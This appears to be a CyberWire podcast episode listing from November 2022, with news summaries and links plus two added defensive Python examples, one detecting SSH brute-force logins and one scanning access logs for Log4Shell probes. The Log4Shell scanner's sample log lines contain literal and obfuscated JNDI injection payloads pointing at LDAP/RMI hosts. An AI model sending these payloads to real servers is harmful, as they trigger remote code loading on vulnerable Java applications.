Larry Cashdollar, Principal Security Intelligence Response Engineer at Akamai Technologies, joins Dave to talk about their research on "KmsdBot: The Attack and Mine Malware." Akamai's Security Research team found new malware that infected their honeypot, which they have dubbed KmsdBot.

The research states "The malware attacks using UDP, TCP, HTTP POST, and GET, along with a command and control infrastructure (C2), which communicates over TCP." The botnet targets weak login credentials and then infects systems via an SSH connection.
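Because KmsdBot gets in by guessing weak SSH credentials, the first place its arrival shows up is the sshd auth log. The following Python is an added example for this page (not Akamai's code and not derived from their honeypot data): it parses the `Failed password` / `Accepted ...` lines sshd writes in syslog format, keeps a sliding window of failures per source address, flags a source whose failures exceed a threshold inside the window (a guessing burst) and, more importantly, flags a login that was accepted from a source that had just produced such a burst, which is the moment a weak credential actually fell. The log lines, the hostname `web1`, the threshold and the two-minute window are this example's own constructed inputs and assumptions; syslog timestamps carry no year, so the example assumes a single log covers one year.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Optional

# Constructed sshd log lines in syslog format (not Akamai honeypot data):
# a password-guessing burst that ends in an accepted root login, then an
# ordinary user who mistypes a password once and logs in with a key.
SAMPLE_AUTH_LOG = [
    "Nov 18 10:02:11 web1 sshd[2201]: Failed password for invalid user admin from 198.51.100.23 port 51234 ssh2",
    "Nov 18 10:02:13 web1 sshd[2203]: Failed password for invalid user ubuntu from 198.51.100.23 port 51240 ssh2",
    "Nov 18 10:02:14 web1 sshd[2205]: Failed password for root from 198.51.100.23 port 51244 ssh2",
    "Nov 18 10:02:16 web1 sshd[2207]: Failed password for invalid user pi from 198.51.100.23 port 51250 ssh2",
    "Nov 18 10:02:18 web1 sshd[2209]: Failed password for root from 198.51.100.23 port 51256 ssh2",
    "Nov 18 10:02:20 web1 sshd[2211]: Failed password for root from 198.51.100.23 port 51260 ssh2",
    "Nov 18 10:02:25 web1 sshd[2213]: Accepted password for root from 198.51.100.23 port 51266 ssh2",
    "Nov 18 10:05:02 web1 sshd[2301]: Failed password for alice from 203.0.113.8 port 40012 ssh2",
    "Nov 18 10:05:09 web1 sshd[2303]: Accepted publickey for alice from 203.0.113.8 port 40018 ssh2",
    "Nov 18 10:06:00 web1 sshd[2305]: Connection closed by 203.0.113.8 port 40018 [preauth]",
]

_SSHD = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse(line: str) -> Optional[Dict[str, object]]:
    """Fields of a Failed/Accepted sshd line, or None for any other line."""
    m = _SSHD.match(line)
    if not m:
        return None
    # Syslog timestamps have no year (assumption: one log, one year).
    return {"ts": datetime.strptime(m.group("ts"), "%b %d %H:%M:%S"),
            "result": m.group("result"), "method": m.group("method"),
            "user": m.group("user"), "ip": m.group("ip")}


def analyze(lines: List[str], threshold: int = 5,
            window: timedelta = timedelta(minutes=2)) -> Dict[str, Dict[str, object]]:
    """Per source IP: failure count, usernames tried, whether `threshold`
    failures fell inside one `window` (a burst), and any login accepted while
    such a burst was still inside the window (likely compromise)."""
    report = defaultdict(lambda: {"failures": 0, "users": set(), "burst": False, "compromised": []})
    recent_failures: Dict[str, List[datetime]] = defaultdict(list)
    for ev in filter(None, map(parse, lines)):
        rec = report[ev["ip"]]
        times = recent_failures[ev["ip"]]
        while times and ev["ts"] - times[0] > window:  # slide the window
            times.pop(0)
        if ev["result"] == "Failed":
            rec["failures"] += 1
            rec["users"].add(ev["user"])
            times.append(ev["ts"])
            if len(times) >= threshold:
                rec["burst"] = True
        elif len(times) >= threshold:
            rec["compromised"].append((ev["user"], ev["method"], ev["ts"].strftime("%H:%M:%S")))
    for rec in report.values():
        rec["users"] = sorted(rec["users"])
    return dict(report)


def flagged_sources(report: Dict[str, Dict[str, object]]) -> List[str]:
    return sorted(ip for ip, rec in report.items() if rec["burst"] or rec["compromised"])


if __name__ == "__main__":
    result = analyze(SAMPLE_AUTH_LOG)
    for ip in flagged_sources(result):
        print(ip, result[ip])
```

A single mistyped password followed by a key login (the `203.0.113.8` lines) stays below the threshold and is not reported, which is the edge case a naive "any failure then success" rule gets wrong; a `compromised` entry is the one to act on first, because the host is already running whatever was fetched over that session.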

    The research can be found here:

    • KmsdBot: The Attack and Mine Malware

    Government security advisories, and the difficulty of recovering from ransomware attacks. Authority for offensive cyber under deliberation. Google wins Glupteba suit. Nov 18, 2022

CISA and its partners issue a Joint Advisory on the Hive ransomware-as-a-service operation. Ransomware continues to trouble governments, internationally and at all levels. The US Defense Department may see enhanced authority to conduct offensive cyber operations. Russian attacks on Ukrainian infrastructure remain kinetic: missiles show up, but cyberattacks don’t. Kevin Magee from Microsoft on leveraging cybersecurity apprentices. Our guest is Paul Giorgi from XM Cyber, describing creative attack paths in enterprise networks. And, hey, glupost’ [GLUE-post]: don’t mess with Google’s lawyers.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/222


    Selected reading.

    CISA Alert AA22-321A – #StopRansomware: Hive Ransomware. (CyberWire)

    #StopRansomware: Hive Ransomware (CISA)

    Vanuatu: Hackers strand Pacific island government for over a week (BBC News)

    Ransom attack cripples Vanuatu government systems, forces staff to use pen and paper (The Sydney Morning Herald)

    Ransomware incidents now make up majority of British government’s crisis management COBRA meetings (The Record by Recorded Future)

    Suffolk County, N.Y., Hack Shows Ransomware Threat to Municipalities (Wall Street Journal)

    Biden set to approve expansive authorities for Pentagon to carry out cyber operations (CyberScoop)

    Red Lion Crimson (CISA)

    Cradlepoint IBR600 (CISA)

    A ruling in our legal case against the Glupteba botnet (Google)


    CISA Alert AA22-321A – #StopRansomware: Hive Ransomware. [CISA Cybersecurity Alerts] Nov 18, 2022

    The FBI, CISA, and the Department of Health and Human Services are releasing this alert to disseminate known Hive Ransomware Group indicators of compromise and TTPs identified through FBI investigations.

    AA22-321A Alert, Technical Details, and Mitigations

    Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.

    Resource to mitigate a ransomware attack: CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide.

    No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov.

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


    Privileged insiders and the abuse of “Oops.” Nemesis Kitten exploits Log4Shell. TrojanOrders in the holiday season. Emotet’s back. RapperBot notes. And an arrest in the Zeus cybercrime case. Nov 17, 2022

Meta employees and contractors compromised customer accounts. Nemesis Kitten found in a US Government network. Unpatched Magento instances hit with "TrojanOrders." Emotet has returned after three quiet months. RapperBot launches DDoS attacks against game servers. Carole Theriault looks at long-term lessons learned from the 2019 Capital One breach. FBI Cyber Division AD Bryan Vorndran updates us on cyber threats. And an alleged "Zeus" cybercrime boss has been arrested in Switzerland.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/221


    Selected reading.

    Meta Employees, Security Guards Fired for Hijacking User Accounts (Wall Street Journal)

    CISA Alert AA22-320A – Iranian government-sponsored APT actors compromise federal network, deploy crypto miner, credential harvester. (CyberWire)

    Iranian Government-Sponsored APT Actors Compromise Federal Network, Deploy Crypto Miner, Credential Harvester (CISA)

    Iranian government-linked hackers got into Merit Systems Protection Board’s network (Washington Post)

    Iranian hackers compromise US government network in cryptocurrency generating scheme, officials say (CNN)

    Magento stores targeted in massive surge of TrojanOrders attacks (BleepingComputer)

    A Comprehensive Look at Emotet’s Fall 2022 Return (Proofpoint)

    Notorious Emotet botnet returns after a few months off (Register)

    Updated RapperBot malware targets game servers in DDoS attacks (BleepingComputer)

    Russia’s cyber forces ‘underperformed expectations’ in Ukraine: senior US official (The Hill)

    Suspected Zeus cybercrime ring leader ‘Tank’ arrested by Swiss police (BleepingComputer)


Getting tangled up in the blockchain. RDS vulnerabilities. The language of fraud. An offer of help to the G19. Nov 16, 2022

Blockchains and cryptocurrency exchanges, and the risks they present. Vulnerabilities in Amazon RDS may expose PII. A study of the language of fraud. Tim Starks from Washington Post's Cybersecurity 202 on a lagging DHS cyber doomsday report. Our guest is Ashif Samnani of Cenovus Energy with insights from the world of OT cyber. And President Zelenskyy offers the benefit of Ukraine's experience with cyber warfare to the "G19".


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/220


    Selected reading.

    Cryptocurrency sector vulnerabilities. (CyberWire)

    Oops, I Leaked It Again — How Mitiga Found PII in Exposed Amazon RDS Snapshots (Mitiga)

    Amazon RDS may expose PII. (CyberWire)

    The specious language of fraud. (CyberWire)

    Zelensky offers G20 leaders to use Ukrainian experience in cyber defense (Ukrinform)

    Ukraine at D+265: A missile campaign punctuates diplomacy. (CyberWire)


    CISA Alert AA22-320A – Iranian government-sponsored APT actors compromise federal network, deploy crypto miner, credential harvester. [CISA Cybersecurity Alerts] Nov 16, 2022

    From mid-June through mid-July 2022, CISA conducted an incident response engagement at a Federal Civilian Executive Branch organization where CISA observed suspected advanced persistent threat activity. In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller, compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence.
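The intrusion chain above starts with Log4Shell against an internet-facing VMware Horizon server, and the earliest evidence of that step is the JNDI lookup string in the web server's access log, usually in the User-Agent or another header Log4j ends up logging. The Python below is an added example for this page, not CISA's tooling and not taken from the advisory or the MAR: it scans access-log lines for `${jndi:...}` after first collapsing the `${lower:...}`, `${upper:...}` and `${...:-...}` nested lookups that attackers wrap around the keyword to defeat literal matching, and reports the source address and the scheme (ldap, rmi, dns) the payload points at. The log lines and addresses are constructed, and the normalizer only handles those three lookup forms; Log4j supports others, so treat this as a high-confidence detector, not a complete one.

```python
import re
from typing import Dict, List

# Constructed access-log lines (not from the CISA engagement); the payloads
# sit in the User-Agent field, the most common injection point.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [15/Jun/2022:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [15/Jun/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 1024 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [15/Jun/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 1024 "-" "${${lower:j}${upper:n}di:${::-r}mi://198.51.100.7:1099/x}"',
    '203.0.113.12 - - [15/Jun/2022:10:01:11 +0000] "GET /static/app.js HTTP/1.1" 200 8192 "-" "curl/7.81.0"',
]

# Nested lookups attackers wrap around "jndi" to defeat literal matching.
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{([^{}]*?):-([^{}]*)\}")  # ${x:-y} -> y, including ${::-y}
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)", re.IGNORECASE)


def normalize(s: str, max_rounds: int = 10) -> str:
    """Resolve case and default-value lookups from the inside out until the
    string stops changing. Case is left as-is because matching below is
    case-insensitive; lower/upper only need to disappear."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(2), new)
        if new == s:
            break
        s = new
    return s


def scan_lines(lines: List[str]) -> List[Dict[str, object]]:
    """One finding per line that contains a JNDI lookup after normalization."""
    hits = []
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        m = _JNDI.search(norm)
        if m:
            hits.append({"line": n, "src_ip": line.split(" ", 1)[0],
                         "scheme": m.group(1).lower(),
                         "payload": norm[m.start():m.start() + 80]})
    return hits


if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_ACCESS_LOG):
        print(hit)
```

A hit means the server was probed, not that it was exploited; the confirming evidence on a Horizon host is an outbound LDAP/RMI connection from the Java process to the address in the payload, followed by the XMRig and Ngrok artifacts the advisory lists.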

    AA22-320A Alert, Technical Details, and Mitigations

    Malware Analysis Report MAR 10387061-1.v1

For more information on Iranian government-sponsored malicious cyber activity, see CISA’s Iran Cyber Threat Overview and Advisories webpage and FBI’s Iran Threats webpage.

    CISA offers several no-cost scanning and testing services to help organizations reduce their exposure to threats by taking a proactive approach to mitigating attack vectors. See www.cisa.gov/cyber-hygiene-services

U.S. DIB sector organizations may consider signing up for the NSA Cybersecurity Collaboration Center’s DIB Cybersecurity Service Offerings, including Protective Domain Name System services, vulnerability scanning, and threat intelligence collaboration for eligible organizations. For more information on how to enroll in these services, email dib_defense@cyber.nsa.gov.

    To report incidents and anomalous activity or to request incident response resources or technical assistance related to these threats, contact CISA at report@cisa.gov, or call (888) 282-0870, or report incidents to your local FBI field office.


An update on three threat actors: Fangxiao, Killnet, and Billbug, one of them in it for money, another for the glory, and a third for the intel. Twitter and SMS 2FA. Zendesk patches. CISA adds a KEV. Nov 15, 2022

Fangxiao works ad scams en route to other compromises. Killnet claims to have defaced a US FBI site. CISA registers another Known Exploited Vulnerability. Difficulties with Twitter's SMS 2FA system. Zendesk vulnerability discovered. Joe Carrigan explains registration bombing for email addresses. Our guest is Miles Hutchinson from Jumio with insights on defense against sophisticated ransomware attackers. And Billbug romps through Asian government agencies.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/219


    Selected reading.

    Fangxiao: a Chinese threat actor (Cyjax)

    Fangxiao: A Phishing Threat Actor (Tripwire)

    Russian hackers claim cyber attack on FBI website (Newsweek)

    CISA Has Added One Known Exploited Vulnerability to Catalog (CISA)

    Twitter’s SMS Two-Factor Authentication Is Melting Down (WIRED)

    Varonis Threat Labs Discovers SQLi and Access Flaws in Zendesk (Varonis)

    Billbug: State-sponsored Actor Targets Cert Authority, Government Agencies in Multiple Asian Countries (Symantec)

    Chinese hackers target government agencies and defense orgs (BleepingComputer)

    Researchers Say China State-backed Hackers Breached a Digital Certificate Authority (The Hacker News)


    Software supply chains, C2C markets, criminals, and cyber auxiliaries in a hybrid war. CISA releases its Stakeholder Specific Vulnerability Categorization (SSVC). Nov 14, 2022

Software supply chain risk. Cyber risk across sectors. CISA releases Stakeholder Specific Vulnerability Categorization (SSVC). Sandworm is back in Russia's hybrid war. Another wiper campaign from a Russian cyber auxiliary. Malek Ben Salem from Accenture shares thoughts on future-proofing cloud security. Rick Howard previews the latest CSO Perspectives show. And the Australian Federal Police say they know who hacked Medibank (and the AFP says it has a good track record catching international criminals).


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/218


    Selected reading.

    Exclusive: Russian software disguised as American finds its way into U.S. Army, CDC apps (Reuters)

    Industries boost cyber defenses against growing number of attacks (Moodys)

    CISA Releases SSVC Methodology to Prioritize Vulnerabilities (CISA)

    Transforming the Vulnerability Management Landscape (CISA)

    Russian Sandworm hackers deployed malware in Ukraine and Poland (Washington Post)

    New “Prestige” ransomware impacts organizations in Ukraine and Poland (Microsoft)

    Microsoft links Russia’s military to cyberattacks in Poland and Ukraine (Ars Technica)

    Microsoft attributes ‘Prestige’ ransomware attacks on Ukraine and Poland to Russian group (The Record by Recorded Future)

    Wipe it or exfiltrate? How Russia exploits edge infrastructure to disrupt and spy during wartime (SC Media)

    Russia’s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless (WIRED)

    Russian military hackers linked to ransomware attacks in Ukraine (BleepingComputer)

    Information on cyberattacks of the group UAC-0118 (FRwL) using the Somnia malware (CERT-UA#5185) (CERT-UA)

    Ukraine says Russian hacktivists use new Somnia ransomware (BleepingComputer)

    Russian hacktivists hit Ukrainian orgs with ransomware - but no ransom demands (Help Net Security)

    Development of the Ukrainian Cyber Counter-Offensive (Trustwave)

    Australian Federal Police say cybercriminals in Russia behind Medibank hack (The Record by Recorded Future)

    Australia tells Medibank hackers: 'We know who you are' (TechCrunch)


    Lauren Campanara: Learn to forgive yourself. [SOC Analyst] [Career Notes] Nov 13, 2022

    Lauren Campanara, a SOC Analyst from ThreatX, shares her story of deciding to break into cybersecurity after spending twelve years in the cosmetology field. She worked her way through college in a job she did not enjoy and felt trapped in while completing her online degree. She found ThreatX and fell in love with the work she is doing now. Lauren hopes to inspire others, especially women, to consider a challenging and rewarding career in cybersecurity. She shares what it's like to be in a field she was not happy in and how she was the only one standing in her way to achieve her goals. She says "Another huge obstacle worth mentioning is learning to get out of my own way. You are your own worst critic. I learned to be more forgiving of myself." She hopes her story will inspire others to follow their dreams and stop holding themselves back.


    An in-depth look on the Crytox ransomware family. [Research Saturday] Nov 12, 2022

    Deepen Desai from Zscaler sits down with Dave to talk about the Crytox ransomware family. First observed in 2020, Crytox is a ransomware family consisting of several stages of encrypted code that has flown under the radar compared to other ransomware families. While other groups normally use double extortion attacks where data is both encrypted and held for ransom, Crytox does not operate this way.

    The research says "The modus operandi of the group is to encrypt files on connected drives along with network drives, drop the uTox messenger application and then display a ransom note to the victim." It also shares how a system may be compromised by this ransomware and goes through each stage in depth.

    The research can be found here:

    • Technical Analysis of Crytox Ransomware

    CSO Perspectives Bonus: Veterans Day special. Nov 11, 2022

    Rick Howard (the CyberWire's Chief Analyst, CSO, and Senior Fellow) and the entire CyberWire team honor our U.S. veterans on this special day.


    US midterms conclude without cyber interference. NATO on cyber defense. New APT41 activity identified. Russia’s FSB and SVR continue cyberespionage. Trends in phishing and API risks. Nov 10, 2022

    There’s no sign that cyberattacks affected US vote counts. NATO meets to discuss the Atlantic Alliance’s Cyber Defense Pledge. A new APT41 subgroup has been identified. FSB phishing impersonates Ukraine's SSSCIP. A look at Cozy Bear's use of credential roaming. Caleb Barlow shares tips on removing implicit bias from your hiring process. Our guests are Valerie Abend and Lisa O'Connor from Accenture with a look at the difference in how women and men pursue the top cyber leadership roles. And an update on phishing trends and API threats.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/217


    Selected reading.

    Statement from CISA Director Easterly on the Security of the 2022 Elections (Cybersecurity and Infrastructure Security Agency)

    No ‘Specific or Credible’ Cyber Threats Affected Integrity of Midterms, CISA Says (Nextgov.com)

    U.S. vote counting unaffected by cyberattacks, officials say (PBS NewsHour)

    What's 'Putin's chef' cooking up with talk on US meddling? (AP NEWS)

    NATO’s 2022 Cyber Defense Pledge Conference (United States Department of State)

    Japan joins NATO cyber defense centre (Telecoms Tech News)

    China casts wary eye as Japan signs up for Nato cybersecurity platform (South China Morning Post)

    Hack the Real Box: APT41’s New Subgroup Earth Longzhi (Trend Micro)

    New hacking group uses custom 'Symatic' Cobalt Strike loaders (BleepingComputer)

    They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming (Mandiant)

    APT29 Exploited a Windows Feature to Compromise European Diplomatic Entity Network (The Hacker News)

    CAUTION‼️ russian hackers are sending emails with malicious links from the SSSCIP (State Service of Special Communications and Information Protection of Ukraine)

    Russian hackers send out emails under the name of Ukraine's State Service of Special Communications and Information Protection (Yahoo)

    Research Report | The State of Email Security 2022 (Tessian)

    DevOps Tools & Infrastructure Under Attack (Wallarm)


    A look back at midterm cybersecurity. Communications security lessons learned in Ukraine. Known Exploited Vulnerabilities and Patch Tuesday. Off-boarding deserves some attention. Nov 09, 2022

    US midterm elections proceed without cyber disruption. Communications security lessons learned. CISA publishes new entries to its Known Exploited Vulnerabilities Catalog. Patch Tuesday notes. Carole Theriault examines cross-border money laundering. The FBI’s Bryan Vorndran offers guidance on how companies should think about their exposure in China. And a recent study finds reasons to be concerned about off-boarding.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/216


    Selected reading.

    Taking a look at election security on US midterm Election Day. (CyberWire)

    Communications Security: Lessons Learned From Ukraine (BlackBerry)

    CISA Adds Seven Known Exploited Vulnerabilities to Catalog (CISA)

    Microsoft November 2022 Patch Tuesday (SANS Institute)

    November Patch Tuesday Updates | 2022 (Syxsense Inc)

    Microsoft Fixes Six Actively Exploited Flaws (Decipher)

    Microsoft fixes ProxyNotShell Exchange zero-days exploited in attacks (BleepingComputer)

    Microsoft Scrambles to Thwart New Zero-Day Attacks (SecurityWeek)

    Infrastructure access and security. (CyberWire)


    Cybersecurity on US Election Day. OPERA1ER threat activity. Insider threats. Hacktivist auxiliaries: influence operators in the hybrid war. And Mr. Hushpuppi is back in the news. Nov 08, 2022

    Cybersecurity on US Election Day. Details on the OPERA1ER threat activity. Seasonal and secular trends in insider threats. Hacktivist auxiliaries: influence operators in the hybrid war. Ben Yelin reviews election security and misinformation. Ann Johnson from Afternoon Cyber Tea speaks with Dr. Ryan Louie about the growing issue of mental illness among cybersecurity professionals. And, hey everybody, Mr. Hushpuppi is back in the news (and back in the slammer, the hoosegow, the big house…you get the picture…a sabbatical at Club Fed.)

    Disclaimer: The content and views expressed do not constitute medical advice and are not a substitute for professional medical advice, diagnosis, or treatment. If you need help, please contact your medical provider.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/215


    Selected reading.

    Your Election Day cyber guide (Washington Post)

    Putin-linked businessman admits to US election meddling (AP NEWS)

    OPERA1ER: Playing god without permission (Group-IB)

    DTEX i3 Team Insider Risk Stats for 2022 (DTEX Systems Inc)

    Killnet targets Eastern Bloc government sites, but fails to keep them offline (The Record by Recorded Future)

    Ukrainian hacktivists claim to leak trove of documents from Russia’s central bank (The Record by Recorded Future)

    Notorious Nigerian influencer ‘Billionaire Gucci Master’ sentenced to 11 years in jail in the U.S. for fraud (Forbes)

    Hushpuppi: Notorious Nigerian fraudster jailed for 11 years in US (BBC)


    Election security on the eve of the US midterms. US FBI rates the hacktivist threat. Microsoft says China uses disclosure laws to develop zero-days. Remember Silk Road? The Feds do. Nov 07, 2022

    Election security on the eve of the US midterms. US FBI rates hacktivist contributions to Russia's war as unimportant. Microsoft accuses China of using vulnerability disclosure to develop zero-days. Andrea Little Limbago from Interos addresses accountability for breaches. Our guest is Michelle Amante from the Partnership for Public Service on their Cybersecurity Talent Initiative. And, finally, remember Silk Road? The Feds do.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/214


    Selected reading.

    Hacktivists Use of DDoS Activity Causes Minor Impacts (FBI)

    The government says it won’t flag election disinformation on Twitter and other social platforms (Washington Post)

    What to Expect When You are Expecting an Election (CISA)

    Nation-state cyberattacks become more brazen as authoritarian leaders ramp up aggression (Microsoft On the Issues)

    U.S. Attorney Announces Historic $3.36 Billion Cryptocurrency Seizure And Conviction In Connection With Silk Road Dark Web Fraud (U.S. Attorney’s Office for the Southern District of New York)


    Gary Brickhouse: Riding the wave of growth. [CISO] [Career Notes] Nov 06, 2022

    Gary Brickhouse, CISO from GuidePoint Security, sits down to share his story, looking back over the last 25 years of his career working for Fortune 100 companies, including Disney. He shares that he has had to grow into every role he has held, and that each one was a pivotal point in his technical career. Gary ended up transitioning to a different organization and says that it was really compliance that was the transitional moment for him as he grew into different roles. He says, “What I found was sort of just, riding the wave of growth and opportunity and trying to take advantage of it along the way.” He shares some advice for new people entering the industry, saying that he wants to help shatter the myth that you have to be technical to get into this field. We thank Gary for sharing his story.


    Over-the-air 0-day vulnerabilities. [Research Saturday] Nov 05, 2022

    Roya Gordon from Nozomi Networks sits down with Dave to discuss their work "UWB Real Time Locating Systems: How Secure Radio Communications May Fail in Practice." Ultra-wideband (UWB) is a rapidly growing radio technology that, according to the UWB Alliance, is forecast to drive sales volumes exceeding one billion devices annually by 2025.

    In an effort to strengthen the security of devices utilizing UWB, Nozomi Networks Labs conducted a security assessment of two popular UWB RTLS solutions available on the market. Their research reveals 0-day vulnerabilities and other weaknesses that, if exploited, could allow an attacker to gain full access to all sensitive location data exchanged over the air.

    The research can be found here:

    • UWB Real Time Locating Systems: How Secure Radio Communications May Fail in Practice

    Flight-planning and rail services disrupted in separate incidents. BEC gang impersonates law firms. Effects of the hybrid war on action in cyberspace. And a farewell to Vitali Kremez, gone far too soon. Nov 04, 2022

    Flight-planning services are affected by cyberattack, as is Danish rail service. A BEC gang impersonates international law firms. Effects of the hybrid war on action in cyberspace. Deepen Desai from Zscaler examines the evolution of the X-FILES Stealer. CyberWire Space Correspondent Maria Varmazis has an analysis of the Starlink situation in Ukraine. And a sad, final farewell to Vitali Kremez, gone far too soon.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/213


    Selected reading.

    Boeing subsidiary Jeppesen's services impacted by cyber incident (Reuters)

    BREAKING: Boeing's Jeppesen Subsidiary Hit With Potential Ransomware Attack (Live and Let's Fly)

    Danish train standstill on Saturday caused by cyber attack (Reuters)

    Cyber incident at Boeing subsidiary causes flight planning disruptions (The Record by Recorded Future)

    Crimson Kingsnake: BEC Group Impersonates International Law Firms in… (Abnormal Security)

    New Crimson Kingsnake gang impersonates law firms in BEC attacks (BleepingComputer)

    Ukraine war, geopolitics fuelling cybersecurity attacks -EU agency (Reuters)

    Microsoft Extends Aid for Ukraine's Wartime Tech Innovation (SecurityWeek)

    Evaluating the International Support to Ukrainian Cyber Defense (Carnegie Endowment for International Peace)

    Cyber community mourns renowned researcher Vitali Kremez (The Record by Recorded Future)

    Remembering Vitali Kremez, Threat Intelligence Researcher (Bank Info Security)


    “Static expressway” tactics in credential harvesting. Emotet is back. Black Basta linked to Fin7. RomCom hits Ukrainian targets and warms up against the Anglo-Saxons. Cyber cooperation? Nov 03, 2022

    Leveraging Microsoft Dynamics 365 Customer Voice for credential harvesting. Emotet is back. Black Basta ransomware linked to Fin7. A Russophone gang increases activity against Ukrainian targets. Betsy Carmelite from Booz Allen Hamilton on adversary-informed defense. Our guest is Tom Gorup of Alert Logic with a view on cybersecurity from a combat veteran. And Russia regrets that old US lack of cooperation in cyberspace–things would be so much better if the Anglo-Saxons didn’t think cyberspace was the property of the East India Company. Or something like that.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/212


    Selected reading.

    Abusing Microsoft Customer Voice to Send Phishing Links (Avanan)

    Emotet botnet starts blasting malware again after 5 month break (BleepingComputer)

    Black Basta Ransomware | Attacks Deploy Custom EDR Evasion Tools Tied to FIN7 Threat Actor (SentinelOne)

    RomCom Threat Actor Abuses KeePass and SolarWinds to Target Ukraine and Potentially the United Kingdom (BlackBerry)

    Russia cyber director warns no U.S. cooperation risks "mutual destruction" (Newsweek)


    OpenSSL indeed patched. CISA is confident of election security. Killnet attempted DDoS against the US Treasury. XDR data reveals threat trends. BEC and gift cards. And that’s one sweet ride. Nov 02, 2022

    OpenSSL patches two vulnerabilities. CISA and election security. Killnet attempted DDoS against the US Treasury. XDR data reveals threat trends. Business email compromise and gift cards. Tim Starks from the Washington Post’s Cybersecurity 202 has the latest on election security. A visit to the CyberWire’s Women in Cyber Security event. And consequences for Raccoon Stealer from the war in Ukraine.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/211


    Selected reading.

    OpenSSL patched today. (CyberWire)

    OpenSSL Releases Security Update (CISA)

    OpenSSL releases fixes for two ‘high’ severity vulnerabilities (The Record by Recorded Future)

    OpenSSL patches are out – CRITICAL bug downgraded to HIGH, but patch anyway! (Naked Security)

    Threat Advisory: High Severity OpenSSL Vulnerabilities (Cisco Talos Blog)

    OpenSSL Vulnerability Patch Released (Sectigo® Official)

    Clearing the Fog Over the New OpenSSL Vulnerabilities (Rezilion)

    OpenSSL vulnerability CVE-2022-3602 (Remote Code Execution) and CVE-2022-3786 (Denial of Service) Check Point Research Update (Check Point Software)

    Undisclosed OpenSSL vulnerability: Free scripts for target scoping (Lightspin)

    Discussions of CISA’s part in elections and the JCDC. (CyberWire)

    U.S. Treasury thwarted attack by Russian hacker group last month-official (Reuters)

    XDR data reveals threat trends. (CyberWire)

    What happens to a gift card given to a scammer? (CyberWire)

    How Russia’s war in Ukraine helped the FBI crack one of the biggest cybercrime cases in years (MarketWatch)


    OpenSSL patched today. The risk of misconfiguration. Cyberespionage (and the risk of mixing the personal with the official). Assistance for Ukraine's cyber defense. And a quick look at DNS threats. Nov 01, 2022

    OpenSSL is patched today. The misconfiguration risk to US government networks' security and compliance. Hacking Ms Truss's phone. Assistance for Ukraine's cyber defense. Joe Carrigan looks at the latest round of apps pulled from the Google Play Store. Our guest is Matias Madou of Secure Code Warrior on why cultivating a positive culture among security and developer teams continues to fall short. And a quick look at DNS threats.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/210


    Selected reading.

    Effectively Preparing for the OpenSSL 3.x Vulnerability (Akamai)

    How The OpenSSL 3 Vulnerability Will Really Affect Your Environment (Nucleus Security)

    New Critical Flaw in OpenSSL: How to Know if You're at Risk (Rezilion)

    Experts warn of critical security vulnerability discovered in OpenSSL (Application Security Blog)

    The impact of exploitable misconfigurations on network security within US Federal organizations (Titania)

    Liz Truss's personal phone hacked by Putin's spies (Mail Online)

    Truss phone was hacked by suspected Putin agents when she was foreign minister, the Daily Mail reports (Reuters)

    Liz Truss phone hack claim prompts calls for investigation (BBC News)

    Russian spies hacked Truss's personal phone (Computing)

